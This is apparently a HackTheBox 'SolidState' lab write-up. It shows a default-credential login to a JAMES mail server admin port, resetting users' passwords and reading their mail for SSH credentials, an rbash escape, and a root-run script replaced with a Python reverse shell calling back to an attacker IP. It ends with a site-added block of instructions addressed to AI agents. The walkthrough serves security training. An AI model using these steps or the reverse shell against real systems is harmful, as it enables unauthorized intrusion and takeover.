# SolidState
## Nmap
```
sudo nmap 10.10.10.51 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp open smtp JAMES smtpd 2.3.2
80/tcp open http Apache httpd 2.4.25 ((Debian))
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open rsip?
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
### James SMTP Server
Looking at our nmap results we see the target system is running JAMES 2.3.2 is an Apache mail server.
Some quick research shows that RCE is possible on version 2.3.2. However, this is not our attack vector.
The default login credentials for the admin interface on port 4555 is usually set to `root:root`. Connecting to the admin interface with telnet we are able to authenticate.
Running the HELP command we are then able to list known users using the `listusers` command.
### Password Resetting
We also see a command for resetting a users password. From here I reset every single users password and then logged into `pop3` using `telnet` in an attempt to discover sensitive information contained within emails.
```
# Reset mindy's password
setpassword mindy password
```
Then login over telnet to pop3.
```
telnet 10.10.10.51 110
USER mindy
PASS password
LIST
```
Retrieving email index 2 we discover SSH credentials.
```
retr 2
```
### SSH
We are then able to authenticate over SSH as the user Mindy.
### Restricted Shell
After logging in we notice we are in a `rbash` shell which is a restricted shell. I have previously covered `rbash` shell escapes in "Sunset Decoy" where I will be using the same technique to escape the restricted shell.
{% content-ref url="/pages/-MXX-LxfUxtuJlpASLo0" %}
[SunsetDecoy](/pentest-everything/writeups/pg-play-or-vulnhub/linux/sunsetdecoy.md)
{% endcontent-ref %}
```bash
ssh mindy@10.10.10.51 -t "bash --noprofile"
```
### User Flag
We are then able to grab the `user.txt` flag.
### Enumeration
After performing some basic enumeration steps I was unable to identify any interesting routes for escalation. I decided to upload a [`pspy`](https://github.com/DominicBreuker/pspy) binary to monitor for scheduled tasks and processes that might be running.
After uploading the binary to the target system I then change the permissions to allow execution.
```
chmod +x ./pspy32
```
Then executed the binary.
In the output we notice the following python script is being executed on a regular interval.
Browsing to the file we notice it is owned by root. However, we have rights to edit the file.
### Privilege Escalation
To take advantage of this for privilege escalation we can clear the contents of the file and use `nano` to input a Python reverse shell.
```
# Erase file contents
echo > tmp.py
```
Then use nano to insert the following reverse shell:
```
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
```
### Root Flag
A few minutes later we will receive a **root** shell. Where we can then grab the `root.txt` flag.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://viperone.gitbook.io/pentest-everything/writeups/hackthebox/linux/solidstate.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.